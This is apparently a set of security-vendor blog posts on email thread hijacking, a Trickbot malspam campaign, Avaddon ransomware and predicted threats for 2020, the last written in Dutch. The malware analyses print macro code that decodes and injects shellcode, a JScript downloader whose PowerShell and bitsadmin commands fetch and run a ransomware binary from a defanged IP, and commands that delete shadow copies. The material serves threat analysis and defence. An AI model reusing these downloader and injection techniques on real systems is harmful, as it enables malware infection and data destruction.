Email Conversation Thread Hijacking

Email Conversation Thread Hijacking


“You should only open email attachments and links from senders you know” is a common piece of advice when it comes to preventing email-based malware and phishing attacks. However, in this article we outline an attack technique called email conversation thread hijacking, which uses existing email conversations of its victims and thus trust relationships to spread to new victims. Against this attack the previous advice will not help. We explain how email conversation thread hijacking is used by attackers, and why it dramatically increases the likelihood for victims to open malicious links or malicious attachments.



Malicious actors try to get victims to open malicious links or malicious attachments. To this end, they often mimic genuine emails, such as invoices. However, if a victim is not customer of a particular company or service they will likely not open invoices claiming to be from those companies or services, especially knowing that this is the most common scheme for malicious actors to lure victims into executing their malware. Malicious actors are thus also often using current events to spark an interest in victims to open their malicious links or malicious attachments. Examples of such events are Christmas, Black Friday, Halloween, Valentines Day, but also currently the SARS-CoV-2 pandemic. However, users are often also aware of these schemes and do not open any malicious links or malicious attachments, especially when they come out of the blue without any context.

Hence, more and more attackers are leveraging a technique called email conversation thread hijacking, also known as email reply chain attack or email thread hijacking. In this technique, an attacker uses existing email conversations of victims to spread to new victims. Previously attackers only used the email addresses listed in victims address books. Email conversation thread hijacking uses also victim’s past existing email conversation threads to spread to new victims. To this end, the attackers will reply to the conversations the victim has in his mailbox.


How does email conversation thread hijacking work?

An email thread hijacking attack begins when a first victim is compromised. Next, their emails and often email login credentials are stolen. The attackers will then reply to the victim’s emails with their malicious messages.

In the following example, the “From” field contains the victim’s email address. The “To” field contains the email address of the targeted user, with which the victim had an email conversation previously. The “Subject” contains the original subject of the email conversation but is prepended with a “Re: “. The quote below the message contains the entire email conversation the two parties had.

Email conversation thread hijacking example

Good attackers also adapt the reply language to that of the hijacked email conversation, e.g., the following example uses a German language reply:

Email conversation thread hijacking example

While in the previous examples the malicious reply email contained a malicious link, these emails can also use malicious attachments:

Email conversation thread hijacking example


How effective is email conversation thread hijacking?

To demonstrate how effective email conversation thread hijacking is, we recreated a real email exchange that we observed during a routine false-positive email inspection:

Email conversation thread hijacking example

In this example, the attackers compromised Joe Schmoe’s email account and replied to an email that Joe has previously received from Alice. They replied with a malicious link (OPEN THE DOCUMENT) and some generic text. Alice released the email from quarantine and tried to open the malicious link, but her browser saved her from getting infected. She subsequently replied to Joe’s compromised email account that she can’t open “the file” and asked if “the file” could be sent in a different format. The attackers then send Alice another malicious link. While we are certain the attackers hijacking a previous hijacked email conversation thread again was coincidence, this example clearly shows how effective email conversation thread hijacking can be.

Fortunately, no attacker tailors their reply emails to fit into the hijacked conversation (yet). However, since threat actors have highly automated email conversation thread hijacking attack tools, the chances that the hijacked conversation involves documents that are shared back and forth is high. And even if it does not, who wouldn’t open a document sent by a known contact within an existing email conversation?


Who uses email conversation thread hijacking?

The number of threat actors using email reply chain attacks keeps increasing. While first observed in May 2017 in a limited targeted spearphishing campaign, many commodity threat actors adopted the technique in 2018.

In 2019, also Emotet adopted email conversation thread hijacking. To this end, they added an email-stealing module. The module steals emails and login credentials from victims and sends them to Emotet’s C2 servers, which distribute them to the systems of other victims infected with Emotet’s spam module, where they are used in attacks against new victims. Recently, Emotet has enhanced its email reply hijacking technique by also stealing attachments from victims and placing its malicious attachment among stolen benign attachments in order for the email to appear even more legitimate.

QakBot is also frequently distributed via replies to existing email conversation threads. In 2020, the Valek malware started to be distributed via email thread hijacking, too.

Hornetsecurity has observed an increase in compromised accounts being used to send malicious emails. While some do not (yet) use email conversation thread hijacking and simply misuse victims’ email accounts to send emails, with access to victims’ email accounts it is trivial to perform email reply chain attacks. A threat actor simply has to reply to emails received by his victims. We are therefore certain that the trend towards email thread hijacking attacks will continue. Therfore, users can no longer rely on a known trusted sender when deciding whether it is safe to open attachments or links.


Conclusion and Countermeasure

The advice to only open email attachments and links from known senders is outdated. With email conversation thread hijacking, even commodity threat actors can automate highly sophisticated and effective spearphishing emails. Often victims are not aware that they are compromised. In such cases it is important to inform victims that they are spreading malicious content via email so they can take measures against the compromise. Immediate actions should be to change the email login credentials. Secondary steps would be to determine how the attackers gained access to the email account in the first place to prevent such incidents in the future.

For humans it is very difficult, if not impossible, to spot email conversation threat hijacking because, by being sent from a legitimate but compromised account, the emails are – apart from the writing style – indistinguishable from real legitimate emails. However, email filters that inspect the attachments or links in emails can detect malicious content regardless.

Hornetsecurity’s Spam and Malware Protection, with the highest detection rates on the market, detects and quarantines threats regardless of whether they use email reply chain attacks or not. Also Hornetsecurity’s Advanced Threat Protection is not affected by email conversation thread hijacking and will inspect email contents regardless of whether it was sent from a compromised account or not. Hornetsecurity’s malware, phishing and ATP filters take precedence over sender allow lists. This way even if a allow-listed sender gets compromised and his email account is misused to send malicious emails, Hornetsecurity customers are protected.

Trickbot Malspam Leveraging Black Lives Matter as Lure

Trickbot Malspam Leveraging Black Lives Matter as Lure


The Hornetsecurity Security Lab has observed a Malspam campaign distribution Trickbot [1] that uses the Black Lives Matter movement as a lure to entice victims to open a malicious attachment. The Trickbot downloader document first injects shellcode into the WINWORD.EXE process. Then from that shellcode spawns a cmd.exe process into which it again injects more of the same shellcode. This cmd.exe process then downloads the Trickbot DLL and executes it via rundll32.exe.


The initial emails claim to be from the State office, Country authority, or Country administration:

Trickbot initial email.

The email tells the recipient they can Vote confidentially about "Black Lives Matter" or Tell your government your opinion, Give your opinion, and Speak out confidentially about "Black Lives Matter".

Attached is a file named e-vote_form_0000.doc, further suggesting the email to be some sort of official vote.

However, the document only displays an image announcing a fake Office update and instructions to “Enable Editing” as well as to “Enable Content”:

Trickbot document.

If the instructions are followed the malicious VBA macro in the document is executed and downloads the Trickbot malware.

Technical Analysis

The initial portion of the infection chain until the Trickbot malware is deployed is depicted in this flow chart:

Trickbot inital infection chain.

In the following analysis we will walk through each stage of this chain.

VBA macro

The VBA macro is protected against viewing in Word:

Trickbot protected macro.

However, this “protection” only prevents Word from showing the VBA macro without a password. The VBA macro code is still accessible.

The first thing the VBA macro does is display a fake error message:

Private Sub Document_Open()
    MsgBox "Error #80013123"

This results in the following pop up:

Trickbot fake error message

This is likely an attempt to probe for user interaction to bypass sandbox detections. It could also be an attempt to cover up that there is no document. A victim may be satisfied by receiving this error and assuming the document is broken.

The macro will use VirtualProtectEx and CreateThread to inject shellcode into the WINWORD.EXE process. To this end, the code assembles one large string:

    uriSubscriber = "i-j-[...]-a-a-a-"
    uriSubscriber = uriSubscriber & "i-l-[...]-a-a-"
    uriSubscriber = uriSubscriber & "g-k-a-a-p-p-h-f-p-i-[...]-o-g-c-c-p-k-h-c-g-j-h-d"

This string contains the encoded shellcode. It is then decoded via the following function:

    Dim f() As Byte
    ReDim f(0 To Len(uriSubscriber) / 2 - 1) As Byte
    Dim sSmart As Long, regOptimize As Long
    For Each destEnd In Split(uriSubscriber, "-")
        If sSmart Mod 2 Then
            regOptimize = sSmart - 1
            regOptimize = regOptimize / 2
            f(regOptimize) = (CByte(Asc(destEnd)) - CByte(Asc("a"))) + f((sSmart - 1) / 2)
            regOptimize = sSmart / 2
            f(regOptimize) = (CByte(Asc(destEnd)) - CByte(Asc("a"))) * 16
        End If
        sSmart = sSmart + 1

Last but not least, the decoded shellcode is set to PAGE_EXECUTE_READWRITE using VirtualProtectEx which was previously aliased to extensionsComment and then a thread is started using the address of the shellcode as the thread’s start address using CreateThread which has been alias to sMail:

    Private Declare Function extensionsComment Lib "kernel32" Alias "VirtualProtectEx" ( _
        iMail As Long, _
        bConsole As Long, _
        regFunction As Long, _
        tablePosition As Long, _
        colMail As Long) As Long
    Private Declare Function sMail Lib "kernel32" Alias "CreateThread" ( _
        textTimer As Long, _
        uriMail As Long, _
        m As Long, _
        dateMembers As Long, _
        textTimer0 As Long, _
        lServer As Long) As Long
    sConsole = destN_ - angleTexture + UBound(f)
    q = extensionsComment(ByVal ipFunction, ByVal angleTexture, ByVal sConsole, ByVal PAGE_EXECUTE_READWRITE, ByVal VarPtr(extensionsComment0))
    adsLogon = sMail(ByVal 0&, ByVal 0&, ByVal destN_, ByVal 2&, ByVal 0, ByVal 0&)
    adsScr 5000

The shellcode can most easily be extracted by breaking on CreateThread in a debugger:

Tickbot shellcode extraction via x64dbg.


The shellcode running in the WINWORD.EXE process first resolves several library functions. Then uses CreateProcessA to run a cmd.exe with the pause command, causing the cmd.exe to idle:

Trickbot shellcode spawning cmd.exe with pause command

Next, the shellcode uses a classic OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread sequence to do shellcode injection into the paused cmd.exe process:

Trickbot shellcode injection into cmd.exe process.

The cmd.exe /c pause process is likely used to evade detections of creating a processes with the CREATE_SUSPENDED flag. A technique that is usually used to start a processes in the suspended, i.e., paused, state, to then inject code into it, and then resume it.

The injected shellcode is the same shellcode that was injected into the WINWORD.EXE process, however, the entry point passed to CreateRemoteThread is different resulting into a different execution flow for the shellcode execution within the cmd.exe process.

Shellcode cmd.exe

The shellcode in the cmd.exe process will also resolve several library functions. Additionally, it will decode the Trickbot download URLs.

Next, the shellcode will query GetSystemMetrics(SM_CXSCREEN) and GetSystemMetrics(SM_CYSCREEN) to get the display resolution. Then GetCursorPos is queried twice, with a call to Sleep(0x1388) in between causing a 5 second delay.

Trickbot profiling the system.

This is likely done to verify mouse movement and avoid sandboxes.

The data is then encoded as a HTTP query string as follows: &scr=1280x1024&cur1=604x250&cur2=622x310

The download URLs are appending with an ID query string &id=00000000 and the above system metrics query string forming the final download URL which is then queried via InternetOpenUrlA:

Trickbot using InternetOpenUrlA to download.

In case the download is successful the downloaded file is written to C:\\Users\\<username>\\AppData\\Local\\system.rre and executed via rundll32.exe %userprofile%/system.rre,Initialize using ShellExecuteA. The system.rre file is the Trickbot DLL.

In case the download is not successful the downloader sleeps and then a second download URL is tried.

Conclusion and Remediation

The double shellcode injection is likely used to evade behavioral detection as WINWORD.EXE usually does not download files from the Internet nor execute rundll32.exe. Hence, such anomalous behavior is more likely detected than cmd.exe spawning the rundll32.exe process. The query for the systems display resolution as well as double query of the cursor position is also likely done to avoid delivering the Trickbot DLL to sandbox systems.

Hornetsecurity’s Spam and Malware Protection with the highest detection rates on the market already detected and blocked the malicious Trickbot document based on a detection signature.

In case the basic detection signatures would have not blocked the emails Hornetsecurity’s Advanced Threat Protection (ATP) would not have been impacted by the various anti-sandbox mechanisms either. The human interaction simulation of the ATP sandbox successfully clicks the fake error message away for a complete execution of the malicious document:

Hornetsecurity Advanced Threat Protection sandbox clicking button

It detects the processes being created by the document, as well as the process injections:

Hornetsecurity Advanced Threat Protection sandbox detecting process injection

The human interaction simulation also results in the two queried cursor positions, send as cur1 and cur2 to the Trickbot download server, to differ:

Hornetsecurity Advanced Threat Protection sandbox Internet connection

This way Hornetsecurity’s ATP sandbox is not fooled by the various anti-sandbox techniques.


Indicators of Compromise (IOCs)


SHA256 Filename Description
d6a44f6460fab8c74628a3dc160b9b0f1c8b91b7d238b6b4c1f83b3b43a0463d e-vote_form_1967.doc Trickbot downloader document


  • hxxps[:]//ppid.indramayukab.go[.]id/may.php?omz=1&pic=b&id=[0-9]{8}&scr=[0-9]{3,4}x[0-9]{3,4}&cur1=[0-9]{3,4}x[0-9]{3,4}&cur2=[0-9]{3,4}x[0-9]{3,4}
  • hxxps[:]//www.inspeclabeling[.]com/wp-content/themes/processing/may.php?omz=1&pic=b&id=[0-9]{8}&scr=[0-9]{3,4}x[0-9]{3,4}&cur1=[0-9]{3,4}x[0-9]{3,4}&cur2=[0-9]{3,4}x[0-9]{3,4}


Avaddon: From seeking affiliates to in-the-wild in 2 days

Avaddon: From seeking affiliates to in-the-wild in 2 days


On 2020-06-03 it was reported [1] that a new ransomware calling itself Avaddon was seeking partners for their affiliate program, i.e., someone installing the ransomware on victim systems. Just two days later on 2020-06-05 malspam distributing the Avaddon ransomware has been observed.

This article briefly outlines the first wave of malspam distributing Avaddon ransomware as observed by Hornetsecurity’s Security Lab.


The initial email of the Avaddon ransomware uses a pretend image lure:

Initial email

The attached ZIP archive contains a JSript file that upon execution will download and execute the Avaddon ransomware binary:

Content of ZIP

Technical Analysis

In the following we will analyze the malicous email, the JScript downloader, and last but not least the downloaded Avaddon ransomware binary.


Emails are send from <name>[0-9]{2}@[0-9]{4}.com sender email addresses. Most of the four number dot com domains ([0-9]{4}.com) are parked domains without any SPF records, hence, blocking on policy grounds is not possible.

The malspam distributing Avaddon ransomware started on 2020-06-04 at around 14:00:00 UTC and are still lasting while writing this report:

Avaddon ransomware malspam wave timeline

The observed wave seems to target CA (Canada):

Avaddon ransomware wave recipient countries

The recipient industries seem to indicate a focus on education institutions at the receiving end of this wave:

Avaddon ransomware wave recipient industries

However, because this is only data from the first wave this should not be interpreted as the final targeting of the Avaddon ransomware.

JScript Downloader

The attachment contains the IMG000000.jpg.js JScript downloader:

Avaddon IMG000000.jpg.js JScript downloader

The Avaddon downloader script is simply:

var jsRun=new ActiveXObject('WSCRIPT.Shell');
jsRun.Run("cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('hxxp[:]//217.8.117[.]63/sava[.]exe','%temp%\\5203508738.exe');Start-Process '%temp%\\5203508738.exe'",false);
jsRun.Run("cmd.exe /c bitsadmin /transfer getitman /download /priority high hxxp[:]//217.8.117[.]63/sava[.]exe %temp%\\237502353.exe&start %temp%\\237502353.exe", false);

It uses both PowerShell and the BITSAdmin tool to download the sava.exe Avaddon ransomware file to %temp%\\5203508738.exe and %temp%\\237502353.exe respectively and execute it:

Avaddon ransomware downloader process tree

Avaddon Ransomware sava.exe

The Avaddon ransomware executable is not packed. However, its strings appear Base64 encoded using a custom alphabet. Imports are freely accessible. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted via a previously from the ransomware binary imported key:

Avaddon ransomware generating AES key

Further the Avaddon ransomware deletes the volume shadow copies via wmic.exe SHADOWCOPY /nointeractive and vssadmin.exe Delete Shadows /All /Quiet.

After encryption the Avaddon ransomware changes the desktop background notifying the victim that files have been encrypted and where the instructions to pay the ransom are located:

Avaddon ransomware desktop background

The Avaddon ransomware leaves a file named [0-9]+-readme.html in every directory it encrypts. This file contains the instructions and an .onion link to the ransomware panel:

Avaddon ransomware ransom note

Victims are expected to copy their ransom ID to the linked .onion Tor hidden service website then received further instructions on how to pay the ransom and receive a decrypter.

Conclusion and Remediation

As can be seen from this example malware underground collaboration can speed up the proliferation and distribution of new ransomware.

Hornetsecurity’s Spam and Malware Protection with the highest detection rates on the market already detects and blocks the outlined threat. Hornetsecurity’s Advanced Threat Protection extends this protection by also detecting yet unknown threats.


Indicators of Compromise (IOCs)


SHA256 Filename Description
05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2 sava.exe Avaddon ransomware


  • hxxp[:]//217.8.117[.]63/sava[.]exe
Top 5 Cyberthreats in 2020

Top 5 Cyberthreats in 2020

We hebben dr. Yvonne Bernard, Head of Product Management gevraagd om ons een deskundig advies te geven over cyberthreats die we in 2020 op onze radar zouden moeten hebben.

Gevraagd worden om te voorspellen wat de volgende grote bedreigingen zijn, zal altijd tegenstijdig zijn: aan de ene kant heb ik toegang tot big data-analysehulpmiddelen die voorspellingen op een geweldig niveau mogelijk maken en ons eigen security lab geeft me alle soorten technische details. Aan de andere kant, voorspellingen vereisen ook een combinatie van intuïtie, ervaring en zelfvertrouwen … Maar het is een geweldige kans om mensen te waarschuwen alleen door in je kristallen bol te kijken, en ik ben bereid de taak op me te nemen.
Yvonne Vortrag
Mijn algemene veronderstelling is dat e-mail de nr.1 aanvalsvector blijft, vooral voor het soort zakelijke klanten dat we dagelijks beschermen. Dat gezegd hebbende, mijn eerste voorspelling kan je verbazen:

1. Gehackte IOT-apparaten

Ik verwacht dat aanvallen op IOT-apparaten in 2020 verder zullen toenemen. Deze apparaten zijn goedkoop en zelfs nuttig in een industrie 4.0 of digitalisatie scenario. Ze missen vaak patch management en zijn gebaseerd op een standaard open besturingssystemen met bekende default gebruikers of admins (bijv. opeHAB voor Raspberry Pi). Ik maak me zorgen in zo’n omgeving dat het niet alleen een Chinese hacker is die je koffiemachine uitschakelt: deze miljoenen gemakkelijk te hacken apparaten met verschillende IP’s wereldwijd zijn de perfecte voedingsbodem voor botnets zoals reaper. DDoS en andere grootschalige wereldwijde aanvallen lopen via, veel kleine of grote bedrijven of via kritieke infrastructuren – door gebruik te maken van wereldwijd gehackte IOT-apparaten, zonder kosten.

2. Big data exfiltration aanvallen met Ransomware as a Service

We hebben Ransomware eerder als een service gezien: mensen zonder enige programmeer- of hacking vaardigheden kunnen hun eigen malware bouwen. Bouwpakketten voor malware zoals Philadelphia (worden verkocht voor $ 389) of de momenteel actieve Satan (via een revenu share verdien model) zijn enkele voorbeelden.

Dit en vergelijkbare simpele malware aanvallen kunnen de aanvallen op MKB-bedrijven vergroten, doordat het nu goedkoper en eenvoudiger is dan ooit. Een klein bedrijf zijn, betekent niet dat u geen potentieel slachtoffer bent van cybercriminaliteit, maar helaas betekent een groot bedrijf zijn dat ook niet.

We zien eerste aanwijzingen dat Data Exfiltration aanvallen op basis van ransomware sterk zullen toenemen. De laatste grote Ransomware afpers trend die is geschreven om gegevens te coderen en het slachtoffer te chanteren door tegen betaling de decodering sleutel te verkrijgen, is nog steeds actief … maar data exfiltration groeit snel: in plaats van te knoeien met de gegevens, worden de gegevens gestolen en verplaatst naar een externe opslag. Aanvallers (soms bewijzen ze zelfs het bezit van de gegevens) dreigen deze vervolgens te publiceren als u niet betaalt. Gestolen gegevens kunnen privégegevens zijn, evenals intellectueel eigendom, bedrijfsgeheimen of klantgegevens. Deze trend is vrij nieuw, maar zal naar verwachting snel groeien.

3. AI-verbeterde malware

Het gebruik van AI voor cyberaanvallen zal toenemen: Deepfakes b.v. om zelfs nieuwe stemherkenning voor de gek te houden zijn al gezien, ook verschillende technieken om het richten van aanvallen te verbeteren. Een van de belangrijkste bedreigingen gebaseerd op AI, is dat malware host systeem bewust wordt:

Nieuwe AI-versterkte malware kan het systeem waarop het is geïnstalleerd beoordelen, voornamelijk welk besturingssysteem het gebruikt en wat de kwetsbaarheden ervan zijn. Vervolgens leert het over de patch status van het systeem. Op basis van de kwetsbaarheden die op de geïnfecteerde host worden gevonden, download AI-verbeterde malware doelgerichte modules van de Command en Control servers. De malware weet al dat de gedownloade modules zullen slagen in de uitvoering, omdat het is ontworpen om de gedetecteerde kwetsbaarheden van het hostsysteem te gebruiken.

4. Slimme Phishing

​Phishing-e-mails worden slimmer, realistischer en meer geautomatiseerd. De hoeveelheid moeilijk te beoordelen phishing-e-mails zal dus in de in-boxen toenemen. Als voorbeeld, veel sociale netwerken bieden API’s waarmee hackers Business Email Compromise naar een heel nieuw niveau kunnen tillen – zowel realistisch als moeiteloos – volledig geautomatiseerd. Nogmaals, deze schaal van realistische aanvallen kan gevolgen hebben voor bedrijven van elke grote.

5. Malware met geencrypte verborgen bijlagen

Vanaf medio 2019 hebben we een toename gemerkt van de hoeveelheid encrypte bijlage waarin malware was verborgen, en dit groeit nog steeds. Dit klinkt heel abstract en onwaarschijnlijk, maar stel je voor dat je op de afdeling personeelszaken werkt en een e-mail ontvangt met een sollicitatie voor een vacature die je op indeed hebt geplaatst. De aanvrager schrijft een perfect passende sollicitatiebrief en hun cv is bijgevoegd in de PDF die kan worden geopend met het wachtwoord “yourjoboffer2020!”. Zou je ervoor vallen?